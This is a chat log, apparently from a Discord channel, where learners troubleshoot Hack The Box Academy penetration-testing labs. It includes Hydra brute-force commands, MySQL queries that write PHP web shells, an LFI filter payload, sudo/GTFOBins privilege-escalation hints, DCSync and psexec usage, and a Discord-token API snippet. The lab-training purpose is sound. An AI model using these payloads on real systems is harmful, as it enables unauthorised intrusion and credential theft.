#modules

u just setting $ne parameter to a variable

variable[parameter]

Ok, might take my brain a while to adapt to this section

if it makes you feel better, the way nodejs handles this differently than usual software stacks is precisely why this vulnerability occurs in the first place

cause devs are thinking just like you and not realizing the parameters can be tampered in such a manner

Ok, I'll see if I can speak to Mr GPT and have him explain the concept to me

Also, reason #500 why learning to code is important in this line of work. Everyone says it isn't necessary, but it sure would help tremendously

  db.collection('tasks').find({ status: { $ne: 'completed' } }).toArray(function(err, result) {
    if (err) {
      console.error('Error executing query:', err);
      return;
    }```

that is a mongodb query using node.js

the people that say it isnt necessary are lying to you

maybe u dont need necessarily know how to code

but u have to understand and interpret the code

Next module will be the Python one. I should have done it before the Advanced SQL Injection module, but I managed to get away with finishing it anyway

hey, anyone has any idea why hydra shows this error when brute forcing smb?

[ERROR] invalid reply from target smb://10.129.xxx.xxx:445/

this is the section I am at https://academy.hackthebox.com/module/147/section/1326

are u connected to the vpn

yup

and is the smb open?

or in that port

yes, and using 445

You don't need to specify the port since you're already doing it with smb://

I am not

you put :445

hydra -L usernames.txt -P password.list <IP> smb

the error msg shows it, but I didnt put it

Oh, i see

try restarting the machine lol

Try CME? That's my go to for bruteforcing smb

that error is for network error

or smb not open

not the solution :c

if u try cme to that ip it works?

it's an option, is there a way to not print every failed attempt?

grep +

| grep '+'

but try it without +

to know if it is network error

STATUS_LOGON_FAILURE

I think it's not a network issue

SQL Injection Fundamentals https://academy.hackthebox.com/module/33/section/799 https://academy.hackthebox.com/module/33/section/194

someone i can ask for these 2 questions? I think I haven't done it with the intended payload

For the DNS part of common services, I need help.

I got 9 subdomains from subbrute

none seem to work for the axfr.

I edited /etc/hosts with target IP and tried also with the IP found using the host command.

It still shows connection problems.

I tried commands such as
dig axfr inlanefreight.com @subdomainFoundBySubbrute
host - l inlanefreight.com server XXXXXXXX.inlanefreight.com

What I am doing wrong?

Hey peeps Can somebody explain this to me, I am confused of why it happened:

I see on this example they set the session to 2, because that's where the first exploit happened. To now execute the post-exploit. All good so far...

But then why here they switch to session 3? 🤣 I just don't wanna miss what's actually happening

When they focused the local suggester to session 2 it was to find local escalation exploits. But then when they are going to execute it (ms10_015_kitrap0d) they use session 3? but What would be on session 3? Shouldn't it be the same session where the first exploit connection happened (session 2)?

Module: Using the Metasploit Framework
Section: Introduction to MSFVenom

const token = ""; //Current Token For Discord Auth
const urpassword = ""; //Current Password (Required For API Call)
const username = "" //Your Wanted Username

let xhr = new XMLHttpRequest();

xhr.open('PATCH', '/api/v9/users/@me');
xhr.setRequestHeader('Authorization', token); //Adds Token To Discord Request
xhr.setRequestHeader("Content-Type", "application/json");

xhr.send(JSON.stringify({ "username": `${username}\u009E`,"password": urpassword })); //Send Data

Code For One Letter Username on discord using ascii codes of new line digits

I was confused by this question too. The question is actually asking about password policies in general, not about any particular host. The anwer can be found on the module page. Hit CTRL+F and search for "password" on the page and you should find the answer.

he can repeat what the module does

to get the password policy

they created the session 3 to run the exploit

Right, does that mean they exploited again? Therefore a new session?

Like session 2 was for reconaissnce in a way, and the 3rd session was another exploit?

<@&861185840277487616>

oh u deleted it already

SHOCK, why the ping... oh boi

yep hahaha

beat ya 2 it

i was referencing that message lol

I know

I saw when the user posted it in bot commands

u deleted it before i could hit enter

they only exploited it 1 time

Has anyone done the Plink pivoting module? I am confused on what I need to do for it.

link

link

https://academy.hackthebox.com/module/158/section/1431

are u in a windows machine?

I am, so just run plink to create a tunnel back to my attacking box?

AD enumeration and Attacks in the Credentialed Enumeration - from Linux part Q1
I've converted Decimal 1170 to 0x492 and I'm currently trying to enumerate user via RPCclient using query user 0x492 Can I get a small hint on what I might be doing incorrectly?

(Nvm 🙂 remove spaces)

windows should be ur attack box

Note: We can attempt this technique in any interactive section of this module from a personal Windows-based attack host. Once you've completed this module from a Linux-based attack host feel free to try to go back through it from a personal Windows-based attack host. Also, when spawning your target we ask you to wait for 3 - 5 minutes until the whole lab with all the configurations is set up so that the connection to your target works flawlessly.

it says it in the section

I guess I just dont understand the question. "Attempt to use Plink from a Windows-based attack host. Set up a proxy connection and RDP to the Windows target (172.16.5.19) with "victor:pass@123" on the internal network." .... I already have a SSH tunnel/proxy setup to access RDP on the other host. Not sure how I would use PLINK on the windows box if I wouldnt have access to it without a tunnel already set up.

Are there anybody facing any connection problem with Skill Assessment - Broken Authentication ?? I've reseted the target many times, but still times out. Tested in different browser also

just do it without plink if u not using windows

use whatever u want from linux

If someone have any doubt in a module ask me, i might have done it 🙂

Hi, i need help on how to set up port forwarding in the following scenario: attack host -> pivot 1 -> pivot 2. I have been able to set up port forwarding through pivot 1 by running "ssh -D 9050 pivot1" then add "socks4 127.0.0.1" to proxychains.conf. I tried to do the same to set up port forwarding through pivot 2: "proxychains ssh -D 9051 pivot2_ip" l, then add "socks4 pivot1_ip 9051" to the previous proxychains.conf file but it doesnt seem to work. Do anyone know what I did wrong?

i have a question regarding intro to active directory module

both kerberos and ldap performs user authentication.

kerberos is used first to get the service ticket.

then when is ldap used to authenticate?

what percentage of CBBH is complete if I complete CPTS path?

I am currently doing the Web Service & API Attacks. I used the Wsdler extension then sent the login operation request to repeater and tried to send the request as is but I am getting that error ... why is that?

close to 55%

That sounds more like the percentage of CPTS path completed after CBBH than other way around

Are you sure its not 85%?

It's 55% CPTS and CBBH core difference lays in Network pentest and the other being Web App pentest.

right and what percentage of CBBH is in CPTS?

wait what?

I thought CBBH had 55% of CPTS and 85% of CBBH was included in CPTS?

no?

I'm not sure, what the percentage for the other way around is. I've worked only on the CPTS modules.

ok cool. I will wait for someone else to answer then

If I had to do the maths, it would be around lesser than 50% I guess

ok

sounds good

dumb question of the night working through CPTS and all the windows boxes have username/password but everytime I use xfreerdp I just get a black box and not able to get in

is there a typical cli tool I'm missing?

just hit enter

LOL

fml

Ty

*quietly leaves server

Hi, a lot of people do CBBH path before going on CPTS journey. I already started CPTS but I want to be able to bug hunt. I completed first module of CPTS and now I'm doing getting started module which is second module. Would it be terrible if after this module I switched to CBBH?

I feel like it would be great to be able to bug hunt so I can make money you know?

You're totally fine to switch as you want

I was suffering from the black screen too, I just thought maybe it's just at the blue warning screen and hitting enter helped lol

is there a practical reason not to tho?

Depends on what your goal is

CPTS covers many of the same modules

i luv cpts path, i did oscp before AD was in my exam, so this is cool

anyone facing trouble while trying to pay for the course?

it gives me error

try reaching out to support

okay, thanks, I wrote to an email yesterday, hope soon will get response

would appreciate any hint/suggestion on this

I am stuck on Credential Hunting in Linux. I got the password for the user kira and am logged in via ssh. Any hint on where to look for the password of user Will please?

chase the fox

someone here did the introduction to bash module?

The way to do it is shown in the module. If I remember correctly it does not show on the cheatsheet though

?

Hello im in password attacks hard lab, i have a file.vhd but is bitlocker encript i try to crack it and i hve a pass but when i try to mount it doesnt work, somebody could help?

give this a try #modules message

Hey i need a discord bot made specifically for my server think of it as a challenge and ill explain the details on our dms

yeah this isn't the place for that, if you are new here read #welcome and #rules and maybe ask that in #general

this channel is for HTB academy modules

sure which section are you on?

thanks!

I will dm you

And if that doesn’t work for you, you can also mount it to your windows host. It’s a lot easier

That’s what I ended up doing

i do that the first time i solve that assessment 🤣

https://academy.hackthebox.com/module/147/section/1320#questionsDiv

hello gus

I have encountered some problems, I tried to brute force ftp, ssh, smb but can't get the initial credentials, can someone give a hint?

got the flag

what wordlist are u using?

Password-Attacks.zip

Good stuff 👍🏼

try another

is not rockyou

yes i am not using rockyou

hydra -L ./username.list -P ./password.list 10.129.202.64 ftp -t 64

Like this, but trying to brute force various services, nothing works

hi, trying the linux privilege assessment room, trying to figure out how to get flag2.txt, any ideas would be appreciated?

yo have another thnik in latest questions

you create it

think of a mechanism that stores certain things that have been ran in the past

hi., i need to contact an administrator, how so ?

morning buddies, at passwords attacks lab - hard, i got the backup at my attack host, i am trying to mount it but it require key or passphrase for ("/dev/sda2"), i tried everything i could get from the vault and searched every file in the shares and sys but got nothing, am i at the right path?

reach out to support (green bubble)

in one of the sections in the module it is showcased how to crack the password for such a file

why would you need an administrator for

i read the welcome page, thus i needed to authenticate the account identifier. that being said, i made 3 mistake attempts, so it say that i need to get a support from the admin, contacting the bott is not working anymore

because

read the error message you are getting again

Identification error: please contact an online Moderator or Administrator for help.

oh i forgot about it 😅 thanks a lot friend 🥰

feel free to dm me

hmm ok understood

hey friend, sorry to annoy you again, i copied the vhd file to my main windows os, its mounted but when i double-click the new created D:\ disk, nothing happens

research

heya! I am in 3rd world country and the pwnbox instance is kinda slow to run. Is it possible to use my own vm with kali installed in it and interact with target for be to be able to finish the module? Thank you!!

yes

Thank you so much for the quick response @autumn pilot !

Hey ! i'm stuck in the live engagement of the module "shell&payloads", when i run the exploit for the host 2 msf returns this : Unexpected json response, and idk why. Can someone help me ?

yeah i found the flag, many thanks for the tip.

i got it ty

Hi everyone, Module:PIVOTING, TUNNELING, AND PORT FORWARDING Chisel lab , On pivot box(ubuntu) I have transferred chisel but i cannot execute the binary as it needs some glibc library . To recompile chisel i need to install go and go cannot be intalled as internet is not on ubunt box. Can anyone advise the way out to run chisel on pivot box?

you'll have to recompile it on your machine and then transfer the new binary over. Make sure you set the flag export CGO_ENABLED=0 before compiling to fix the issue

In case you don't want to recompile it there is one already compiled at:
https://github.com/jpillora/chisel/releases/tag/v1.8.1

Ohh got this. I think its better using compiled version . Gonna trie the compiled 1.8 version this time.

Many thanks for pointing in right direction.

sounds like a threat

Hi I’m in password attack module in password mutation to solve questions I made mut_password.list depending on custom.rule so when using hydra with sam user I can’t solve question and I try to use crackmapexec still not working any hint ?

hint remove the first 17000 word

can someone maybe help me with the answer to the loop control part of the bash introduction module? ive been trying to finish it for a couple hours and im pretty sure my script is ok but it refuses to run no matter what i do

talk with chatgtp may be it can pinpoint the mistake in your loop

hi, sorry. any tip for flag5.txt . been trying for some time now. no luck.

it is simpler than you think, don't overcomplicate it

k

For some reason the only change gpt made is "" around variables so it would 100% take their values and it now tells me thqt it does not work because of limited storage on the hdd

checkin in gtfobins , found that command

executed it as shown in gtfo, but i am stuck,. no idea what to perform next

if you have executed the command in the shown sequence, then you will have a shell

where to put in the second part of that command , ocne i type in the fiorst part of the command . i get some output

and the second part of the command as shown in gtfo bins is executed as a separate command

!/.... not found

Bro this is another challenging not hint 😅

yeah that's the hint is for that section the right password for the sam user is 17000+ word deep so remove the first 17000 word make the brute forcing much faster

Can someone help me out with shells&payloads module live engagement host3? solved

sure

Great… I use this command to remove first 17000 word # sed -i ‘1,17000d’ mut_password.list this make my file empty to check how words I have I’v just 1504 words

then your mut_password is broken. should be much larger than that

yeah that list should be 94k+

can anyone help me with Exploiting Web Vulnerabilities in Thick-Client Applications?

IDK why I have just this word actually I used this command to generate mtu_pass #hashcat —force password .list -r /usr/share/hashcat/rules/custom.ruls —stdout l sort -u >mut_pass I make my custom rule depending on ‘Hashecat rule file ‘ section

use the given rule not that rule

wait a sec there is no rule with that name in the default hashcat rule? (i check on the pwnbox)

No in your kali you should make our rule or use default rule

I will try on best64.rule

just use the given rule in the resources

Hello all
I'm just doing Attacking Common Services > Attacking FTP and I got a problem at the beggining
There is no ftp port open 21 and also 2121
Any ideas what is going on?

give the machine 3-4 minutes for the services to load, and if they haven't reset the target

try to reset or give it some time

I was trying it

😦

any other ports are visible but ftp is not working don't know why

bro they test ur patience too, so make sure you r trying ur best

I also terminate and set up the target

then wait

I love them

despite of best46 most common but still doesn’t work

now it's working XD

I told you bro

patience comes second right after knowledge

you have powershell?

I'm 7 years with my fiance, I'm soo patience XD

ahahhahahahhah

you killed that

thanks, have a nice day

!!!

I will send you example

#modules message

check dm

I'm doing the last chapter of Getting Started module, the box called gettingstarted. I get the user flag, logged as www-data user and having difficulties on getting root.
I found out:
||I can execute a symbolic link as sudo but when I execute it nothing happens, I tried to edit the pointing path but I got permission denied.
I found out that the sudo version is 1.8.31 and there is an exploit but executing it was unsuccessful and honestly I dont know what parameters it is asking for.
I am guessing that maybe I have to become user mrb3n and then do something else... or find the SSH key somewhere and log in as mrb3n i dont know...||

I need hints I dont want to check the writeup, please point me in the right direction.

what is the command that allows running the specified command as a certain user, how can you check for that particular command

Hello, i really need help for one of the modules , i think is a bug or something

it helps if you specify the module name and section, and eventually on which question

Attacking Enterprise Networks - Active Directory Compromise

The question:
After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop

ya I found it ||B@*******|| thanks 😊

$group = Convert-NameToSid "Server Admins"

this one gives me nothing

Convert-NameToSid that's a powerview function right? Have you imported the PowerView module?

yeah

well you are assign the command to a variable, until you call that variable in a subsequent command it will not return anything

what if you run the command without assigning it to a variable as scriptie suggested

im running this as admin

The only command I know so far is ||sudo -u mrb3n /usr/bin/php|| but I had the same result, no output.
I found out this:
||```
www-data@gettingstarted:/tmp$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

I am afraid it might be a rabbit hole and not the right direction.

if it had to be ran as that user, it will specified in the output below

focus on ||(ALL : ALL)||

also, think if it this could be in GTFObins

can you try ConvertTo-SID

regarding the hard lab in password attack, when i try to mount the bitlocker drive on a windows host i get a "Your account doesn't have permission on the domain to mount this file". When i try to mount it on Linux using dislocker and losetup (as was mentioned by Payload Bunny) i get "[CRITICAL] Cannot parse volume header. Abort." Any help would be greatly appreciated!

run the command outside of the variable you have assigned

Convert-NameToSid - converts a given user/group name to a security identifier (SID)

Yeah, I thought the problem would be with Aliases. not the case here.

Have you succesfully imported powerview?

yeah

you are running a different command, than the one already showed

Also can you try giving the domain name behind the Group name

DOMAIN\GROUP

do u know how?

the command is Convert-NameToSid and not "Convert-ToSid"

it's the same...

i already try these

Can you list the files on the desktop

Convert-NameToSid "DOMAIN\Server Admins" like this but it's totally a try

wont work

Oof.

it's shit

Can you list Server admins using net group

you can also use sharpview binary

damn

wtf

Maybe try closing the session and import the modules to a new one and try again.

Powershell session*

@untold lily can you check the md5sum of the vhd?

i got it..

What was the issue actually?

what worked lol

its different lol

So try another way of transferring it over, they need to be the same 👍🏼

I had the same problem at first

how about the windows method. why is it requiring me to have permission to mount it?

The md5sum is not the same so I doubt you can even mount it, since it’s corrupted

Try another way of transferring, if the md5sum is the same, the windows method will work

javac: file not found: fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java
Usage: javac <options> <source files>
use -help for a list of possible options

I am getting this error what can I do

Exploiting Web Vulnerabilities in Thick-Client Applications

ok thanks

Let me know if it works👍🏼

the problem was that i need to use different user (run power shell as different user)

I just solved it. Thanks bud, i couldn't have done it without your help!

Good job!💪🏼

How does one dump sam/lsa using a local administrator account in secretsdump.py You can do that in cme but can you in secretsdump?

Did you find a solution for this? Facing the same issue

Guys, I need help with Exploiting Web Vulnerabilities in Thick-Client Applications

where should I drop this code? exactly at which line?(see below)

import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
if (AccessCheck.checkAccess(methodName, this.user)) {
return "Error: Method '" + methodName + "' is not allowed for this user account";
}
this.action = new ActionMessage(this.sessionID, "open");
this.action.addArgument(foldername);
this.action.addArgument(filename);
sendAndRecv();
String desktopPath = System.getProperty("user.home") + "\Desktop\fatty-server.jar";
FileOutputStream fos = new FileOutputStream(desktopPath);

if (this.response.hasError()) {
    return "Error: Your action caused an error on the application server!";
}

byte[] content = this.response.getContent();
fos.write(content);
fos.close();

return "Successfully saved the file to " + desktopPath;

}

while editing fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java

yes

I did

look for other Disks

there are other ones

dm me

I recall that being possible with the registry hives via RDP or an elevated shell session with the hklm/sam security and system then dump with secretsdump, need the syntax?

Guys

any help please

are you talking about the reg save hklm\<hives> file?

I'm not talking about techniques or tool outside of secretsdump.py in this case

Just a thought that crossed my mind whethere secretsdump.py can do it because crackmapexec can

thanks managed to resolved it. can i check for the 2nd part of the assessment, if you have managed to performed a stack query + rce using postgresql library?

Stack query?

Module: Kerberos Attacks
Section: Unconstrained Delegation - Users
I have got the .ccache file. But I cant do DCSync Attack

You dont need to go that far. You just need to perform an injection similar to what's demonstrated over the last 3-4 chapters of the module. I'd recommend taking the demo POC code for the Command Execution and modify it for the Skill Assessment. That way you can iterate through your tries more quickly.

Linux Prive Esc just got bigger

50% incease

Yup lol

if you know the issue please ping me @acoustic owl

which SPN have you used?

im doing web proxies, encryption and decription section

i get the base64 - i decrypt it three times then i get this `||JTQ4JTU0JTQyJTdiJTMzJTZlJTYzJTMwJTY0JTMxJTZlJTM2JTVmJTZlJTMxJTZlJTZhJTM0JTdk|| what is this? in the hint is says use b64 and html encoding but this is not html encoding lol

Well it could be multiple layers of encoding

If you tried 3 layers and it still looks weird, might be 4, might be more 🤷🏼‍♂️

yeah, this jsut did not look like b64 lol

Have you tried though?

yeahyeah i finished it

just saying doesnt look like b64 xd

Dont say such worrying things. I want to finish off the last few modules!

If the character set matches it's always possible. Decoding is always a bit guessy

That's exactly what I thought lol
Though it is kinda cool to get more content

This is why you use CyberChef. It will automatically confirm it for you 😄

Can I get some help with the Footprinting module? Specifically the IMAP/POP3 section

I didn't want to suffer alone 🧑‍🦯

Ask what you want to ask here directly, will make it easier for everyone to take a look and answer you.

Ah ok

I'm stuck at the question about finding the admin's email address

I can authenticate to the IMAP server using OpenSSL but there are no emails in the inbox

I'm not sure if I'm doing something wrong or looking in the wrong place

The next question also needs me to access the emails in the IMAP server but I just get 0 emails listed there

It's a bit tricky to list it but I believe this cheatsheet should help https://donsutherland.org/crib/imap

You can use Evolution to make it easy, but it's not the intended way.

This is what i see in the IMAP server

* LIST (\Noselect \HasChildren) "." DEV
* LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
* LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
* LIST (\HasNoChildren) "." INBOX

Now i just noticed that DEV and DEV.DEPARTMENT have \HasChildren

But I can't figure out how to select them

Should i go for the windows and windows command line introductions if i already did the tryhackme ones and i have experience with both?

Hello! Could you give a hint for Abusing HTTP Misconfiguration Skills Assessment - Easy? Solved Hard, but this I can't understand. Tried a lot of ||session puzzling|| combinations. Sorry for tagging @pine dagger, can't DM you, we already discussed with you this module

Why can't i start an instance for the Linux Privilege Escalation room

Hi all I have been stuck on Attacking Email Services a few days now and i cannot figure out what im doing wrong, i found the user but when i try to brute the password either with the provided list or Rockyou i get no hits i have tried "username" and "username@inlanefreight.htb" and still no luck

👋 Hi everyone!
Can someone please help me with "Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer" from "Active Subdomain Enumeration" module?
FYI, I have completed all Questions from the module, and have found the answer from the aforementioned question as well. But I still feel like I managed to find it by trying out things rather than being certain about it.
I went through various links posted in previous threads (like https://www.cloudflare.com/learning/dns/glossary/dns-zone/ and https://ns1.com/resources/dns-zones-explained) but I feel like what I found in those links does not reflect what the question was actually asking for.
Can I DM someone that can help me as to why the answer is the specific one, and what defines a "zone"?

you're probably fine without then. If you run into issues in other modules you can always go back to the fundamentals

message support in that case. they'll be able to help

👍

is it the file inclusion module bugged?

i have no button to click in complete

https://academy.hackthebox.com/module/23/section/251

hard reload the page maybe?

i hadnt submited an answer lol

i just wrote it in my notes

is there a way to list the /usr/share/flag directory in the last question?

i did ||/usr/share/flag/flag.txt|| just guessing the flag

but not sure if i can list the directory

b select <inboxname>

I don't remember any ||/usr/share/flag|| directory. which section is that?

https://academy.hackthebox.com/module/23/section/251

Submit the contents of the flag.txt file located in the /usr/share/flags directory.

you have a typo

Hi I’v problem when use pypykatz on my machine to break lsass.dmp anyone know who can I solve it ?

I search in google but I didn’t find anything

wdym

you have mistyped one of the directories

ah well flags*

Error is no module named ‘msldap.commons.url ‘

have you tried pip installing msldap?

To resolve this issue, you can try the following steps:

Verify installation: Confirm whether you have installed the 'msldap' module and its dependencies correctly. You can use the following command to install it via pip:

Copy code
pip install msldap
Upgrade the module: If you already have 'msldap' installed, you can try upgrading it to the latest version using the following command:

css
Copy code
pip install --upgrade msldap
Check import statement: Ensure that you are importing the module correctly in your Python code. The import statement should be:

python
Copy code
from msldap.commons.url import LDAPURL
Check module availability: If you have installed 'msldap' but still encounter the error, it's possible that the module doesn't include the 'msldap.commons.url' submodule in its latest version. In that case, you might need to consult the documentation or contact the module's maintainers to confirm if the submodule has been renamed or removed.

Environment isolation: If you are working in a virtual environment, make sure you have activated the correct environment where 'msldap' is installed.

By following these steps, you should be able to resolve the "No module named 'msldap.commons.url'" error.```

Thanks but when following your steps still nothing changes .. after I write Import statement on python code still nothing change

Attacking Common Applications
Attacking GitLab Find another valid user on the target GitLab instance. I have found 11 usernames but none of them work. what wordlist do i use?

Ya nothing change🥲

Hi! I have question regarding XSS module Section Hijacking. Who can assist?

I'm considering giving the Info sec foundations a go as I've not really tried learning anything about pen testing etc before as I'm fairly new to IT career just wanted to hear what people think of the paths and modules from hack the box etc

InfoSec foundations is def a good starter for you then

can anyone give me a HINT in "Active Directory Enumeration & Attacks " "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux" section's last question? how can i login to ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL

from the provided attack host you can reach the machine

i have sapsso user and it's password. i tried to login with those credentials using psexec but didn't worked

any other idea?

you are on the right path, focus on how you need to construct the command

this is command im running --> psexec.py academy-ea-dc03.freightlogistics.local/sapsso:PASSWORD@172.16.5.5
and this is response --> [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

is any mistake in command?

the IP from what I can see and maybe you can work on the netbios name

Thanks again it’s working now just Im uninstalling pyp and reinstalling

this is DC's IP . question is about logging in ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller

i dont have other idea which IP should i use

freightlogistics != inlanefreight

both are different domains

I am working on attacking common services, attacking ftp, and I am either getting no results for the username available on the server, or I am getting the user for the SMB section. I am using hydra and the lists provided on port 2121. I see that some other people have had this issue but not resolution to the problem was posted in the discord. Am I missing something here?

are you using the provided username and password lists?

yes

Is the port 2121 opened or closed?

it was open yesterday when I was having the issue, and just now it was closed... I just restarted the target and I am running hydra again. Confirmed that I have the correct lists being used too.

It found no valid passwords

using -t 64

target is up

no results

there are other wordlists

have you tried anonymous logon?

Any ideas ?

Do you still need help?

Which module?

feel free to dm me your command

connection refused

and rockyou says it is going to take mutiple days to finish

rockyou is not the wordlist you have to use

Attacking Common Services

and not the provided one either?

there is another one that is provided, but you must find it

and you must get it

Doesn't the module provide a list?

it dose it just me beeing a complete moron... i just saw my typo as i was dm'ing @autumn pilot but thanks for your help guys

that exercise has a twist

am trying to decode a file from base64 how can i do it?

am tryin cat file | base64 -d
base64 -d /tmp/file

hmm, that should work tho. If it ain't too long try putting the same on cyberchef and see what you get

it is long

it's invalid

where'd you get it from?

https://academy.hackthebox.com/module/23/section/253

/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

Ah PHP wrappers

you've prolly messed up somewhere on extracting the base64 I guess

try outting it to a file directly with curl -s

I am not sure what you are referring to with another list

There is a downloadable wordlist in the module top right I think

that is the one I have been using with no results

I remember having some problems with the FTP one I had to redeploy the vm a few times

there is one more on the service itself

hellooo I'm working on Linux Privilege Escalation today, and the content update looks neat!! I'm having trouble booting the new VM though—is that to be expected since it's new and I should try again in a few hours, or is there something for me to update or troubleshoot?

VMs failed to spawn. If this persists please contact support.

https://academy.hackthebox.com/module/23/section/254

any hint?? i tried a lot of payloads but i dont get it work

nvm i was using the my ip from yesterday and that is why i couldnt get the shell lol

there's a mistake on module 19 section 102 Filtered Ports > 443, but it's supposed to say port 139

What's the contents of table flag10? (Case #10):
--random-agent

https://discord.com/channels/473760315293696010/858470491676737536

(for anyone else who needs it: I got an update from the support staff, saying basically "yep we're working on it!")

Existe algun modulo para aprender pentesting en android?

no

thanks

https://www.hackthebox.com/blog/intro-to-mobile-pentesting

also english only server

ok, only english, and very thanks

i think offensive security has android and iOS section

also MacOS

can anyone help me on the Attacking Common Services: Easy Lab, I'm having trouble figuring out how to upload my reverse shell to C:\xampp\htdocs. I've tried a few methods with no luck

Ok, I'll check it right now.

what did u try

i tried uploading using mysql

what command did u use

||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\hell.php";||

also tried various method || select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\hell.php';||

swap " for '

for both ?

yea

an this is wrong by the way

u doing INTO OUTFILE 'PATH"

still doesnt work

||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "C:\xampp\htdocs\shell.php";||

What's the contents of table flag11? (Case #11):
"link"
--tamper=between

-.- swap ' for "

and " for '

||SELECT '<?php echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\final.php';|| doesnt work 😧

hey can anyone provide a bit of help I'm trying to do active directory enumeration and attacks and the rdp creditials are saying incorrect via my local kali and the pwnbox u got any solutions

are u just trolling?

lol no why ?

why u have \\

un ot using the right credentials

i just experimented it out because of this MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "C:\xampp\htdocs\l.php"; ERROR 1086 (HY000): File 'C:xampphtdocsl.php' already exists even tried with \ same the blank page

they are the creditials provided by htb copied and pasted

^*

like it I just need to run inveigh but I can't rdp to do so

with ' '?

I'll try now

||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\backdoor.php';||

ERROR 1 (HY000): Can't create/write to file 'C:xampphtdocackdoor.php' (Errcode: 22 "Invalid argument")```

still not working

should be pointed out that xfreerdp gives me a black screen rdesktop will remote but invalid password

and if i used \\ it works but doesnt get command execution ||MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\backdoor.php'; ERROR 1086 (HY000): File 'C:\xampp\htdocs\backdoor.php' already exist||

press enter

ig im making some dumb mistake

thank you did I just miss a prompt or something

man if it already exist just create it with other name

although it just booted me off and is now failing to connect at all

who else having the same problem like me on WINDOWS PRIVILEGE ESCALATION MODULE, the RDP sessions are not stable or it is from my network ?

do you have pwnbox and vpn active at same time?

just VPN

ah dunno then

man thank you it worked . by this 🙂

https://academy.hackthebox.com/module/23/section/622

someone could help me

||i created a file called shell.php in /var/www/html||

||and i changed the php.ini parameter:
disable_functions = system,exec,shell_exec||

i restarted the page and im asking for the shell but nothing

                                                                                                                    
┌──(root㉿kali)-[/usr/…/wordlists/seclists/Fuzzing/LFI]
└─# curl http://10.129.x.y/shell.php&cmd=id
[1] 186854
                                                                                                                    
┌──(root㉿kali)-[/usr/…/wordlists/seclists/Fuzzing/LFI]
└─# 
[1]  + done       curl http://10.129.x.y/shell.php```

whats your shell.php

<?php system($_GET['cmd']); ?>

Cool

now read the questions again

-.- yea

i was trying to get the error shown in the screen lol, thanks

hello, when I run subbrute.py is it normal it returns :
No nameservers found, trying fallback list?

it wont show in the screen, gotta fetch the error log itself

in lab environment? yes

yes in lab.

gotta change the nameservers

in resolvers.txt?

by default tool assumes real world internet, not internal lab environment

ye

thx

the results are in ".com" instead of ".htb". Is this normal as well?

depends

u had to use hackthebox.com

if i remember well

I made the mistake to enter "inlanefreight.com" instead of htb...

I get the correct results now...

Can I DM someone about the pivot/tunneling section and using rpivot? I have the tunnel set up, but not having luck getting the flag

u just have to use firefox

or cheat and dont use the pivots they recommend

ligolo-ng and chisel are gods

this tool is god

https://github.com/p3nt4/Invoke-SocksProxy

Ohh k

this is for learning with ethical purposes

Module: Active Directory Enumeration & Attacks
Section: DCSync
Problem: Trying to use impacket-secretsdump to perform the DCSync from Kali but keep getting "STATUS_NO_SUCH_DOMAIN". Anyone see any glaring issues with my command? I've already gotten the answer with mimikatz, but it'd be good to know what i'm doing wrong here.

Like it suggest, add -Pn

are you connected to the vpn? can you ping the address? what module/section are you doing?

u doing this question?

What is this user's cleartext password?

yeah i got it with mimikatz, just wondering why impacket wasn't working for me

that isnt the ip

I'm not sure i understand what you're saying...

I also tried impacket-secretsdump -just-dc -dc-ip 172.16.5.25 inlanefreight/adunn...etc...

https://academy.hackthebox.com/module/15/section/32

do this module first

that isnt the ip either

and they give u an account to log in with ssh

if im right

or if u want do it from ur machine just do a dynamic port forwarding to the ssh

it was rdp

ssh htb-student@172.16.5.225

i have this in my notes

port 22 isn't open

read the beginning of the section

oops, now i remember lol have to use their parrot box

and this is not the adunn ip

do ping sweep if u need

but the ip is in the section as well

yeah its 5, i did get-domaincontroller

well gn gl

👌 cheers

you are having a problem with DNS resolution. Try to specify the entire domain name (FQDN), like inlanefreight.local/user:pass and use the name of the computer instead of ip like: dc01.inlanefreight.local. Of course, make sure everything is well set up in your host file

the academy has been a pretty fun journey. I learned a lot through all these modules so far, let's continue hacking! 😎 💪

yeah, figured it out. It was just the specific environment. I ended up proxying through the box and it worked as advertised

Can anyone point me in the right direction?

Im stuck on AD enum&attacks assessment part 2 with the question "Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in the file?" I have found all other users and there credentials and have answered every other question in the assessment. i have enumerated sql01, ms01, dc01, several times over and rummaged through rpc mssql and smb shares on every host and I am stumped on where the hell im suppose to look. can someone give me a clue to what im looking for?

I have had a 2 day long headache trying to find this file just looking through files and folders and now im just completely burnt out trying to figure this out

which tools have you tried so far

